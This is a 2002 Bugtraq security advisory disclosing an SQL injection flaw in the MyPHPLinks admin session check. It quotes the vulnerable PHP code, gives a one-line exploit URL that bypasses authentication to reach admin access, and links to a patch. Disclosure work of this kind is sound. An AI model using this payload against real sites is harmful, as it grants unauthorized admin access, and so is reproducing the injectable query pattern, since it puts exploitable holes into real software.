Bugtraq mailing list archives
MyPHPLinks (PHP) : SQL Injection
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 14 Dec 2002 19:41:45 +0100
Informations : °°°°°°°°°°°°°° Website : http://www.myphpsoft.net Version : ? -> 2.1.9, 2.2.0CVS Problem : SQL Injection -> Admin access PHP Code/Location : °°°°°°°°°°°°°°°°°°° admin/auth/checksession.php --------------------------------------------------------------- [...] if($idsession!=''){$dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, $MyPHPLinksPass);
if(!$dbs->connect()) die($dbs->error);if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where session='".$idsession."' and timesession > now()"))
die($dbs->error); while($dbs->nextrecord()){ $loginauth = $dbs->valeur("nb"); } if ($loginauth==0){ header("Location:$MyPHPLinksAuthPErrDef");exit; }else{if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'"))
die($dbs->error); } }else{ header("Location:$MyPHPLinksAuthPErrDef");exit; } ?> --------------------------------------------------------------- Exploit : °°°°°°°°° http://[target]/admin/index.php?idsession='%20OR%20''=' Patch : °°°°°°°A patch can be downloaded on http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=m .
More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/MyPhpLinks.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Current thread:
- MyPHPLinks (PHP) : SQL Injection Frog Man (Dec 14)